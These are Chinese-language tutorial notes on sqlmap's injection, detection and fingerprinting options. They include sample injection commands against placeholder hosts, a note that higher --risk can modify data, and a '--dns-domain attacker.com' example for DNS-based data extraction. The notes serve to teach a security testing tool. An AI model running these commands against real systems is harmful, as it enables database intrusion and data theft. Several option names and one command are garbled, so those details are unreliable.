注入参数介绍
-p
- 指定扫描的参数,使--level失效
- -p "user-agent,referer"
--skip
- 排除指定的扫描参数
- --level=5 --skip="id,user-agent"
URl注入点
sqlmap -u "http://targeturl/param1/value*/param2/value2/"
--dbms指定内容,提升工作效率(例如:--dbms="mysql")
- MySQL<5.0>
- Oracle<11i>
- Microsoft SQL server<2005>
- PostgreSQL
- Microsoft Aceess
- SQLite
- 等等
--os
--invalid-bignum / --invalid-logical
- 通常sqlmap使用负值使参数取值失效 id=12 → id=-13
- bignum使用大数使参数值失效 id=999999999999
- Logical使用布尔判断使取值失效 id=13 AND 18=19
--no-cast
- 榨取数据时,sqlmap将所有结果转换为字符串,并用空格替换NULL结果
- 老版本mysql数据库需要开启此开关
--no-escape
- 出于混淆和避免出错的目的,payload中用单引号界定字符串时,sqlmap使用char()编码逃逸的方法替换字符串
SELECT 'foo' → SELECT CHAR(102)+CHAR(111)+CHAR(111)#按照原样子参数发送
--prefix / --suffix
- $query = "SELECT * FROM users WHERE id=('''.$_GET['id'].''')LIMIT 0,1";
sqlmap -u "http://1.1.1.1/sqlmap/mysql/get_str_brackets.php?id=1" -p id --prefix''')" --suffix "AND('abc'='abc''query = "SELECT * FROM users WHERE id=('1')AND ('abc'='abc')LIMIT 0,1";
--tamper
sqlmap -u "http://?????" tamper="tamper/between.py/???.py" -v 3
检测参数介绍
--level
- 1-5级(默认1)
- /usr/share/sqlmap/xml/payloads 查看不同级别下发送不同的payload
--risk
- 1-4 (默认1 / 无害)
- Risk升高可造成数据被篡改等风险(update)
--string, --not-string, --regexp, --code, --text-only, --titles
- 页面比较,基于布尔的注入检测,依据返回页面内容的变化判断真假逻辑,但是有些页面随时间阈值变化,此时需要认为指定标识真假的字符串;
检测SQL注入存在的技术类型
默认使用全部技术
- B:Boolean-based blind
- E:Error-based
- U:Union query-based
- S:Stracked queries(文件系统,操作系统,注册表必须)
- T:Time-based blind
--time-sec
--union-cols
- 默认联合查询1-10列,随--level增加量最多支持50例
- --onion-cols 6-9
--union-char
- 联合查询默认使用NULL,极端情况下NULL可能失败,此时可以手动指定数值
- --union-char 123
--dns-domain
- 攻击者控制了某DNS服务器,使用此功能可以提高数据榨取的速度
--dns-domain attacker.com
--second-order
--second-order http://1.1.1.1/b.php
指纹信息参数
-f, --fingerprint, -b, --banner
- 数据库管理系统指纹信息
- DBMS,操作系统,架构,补丁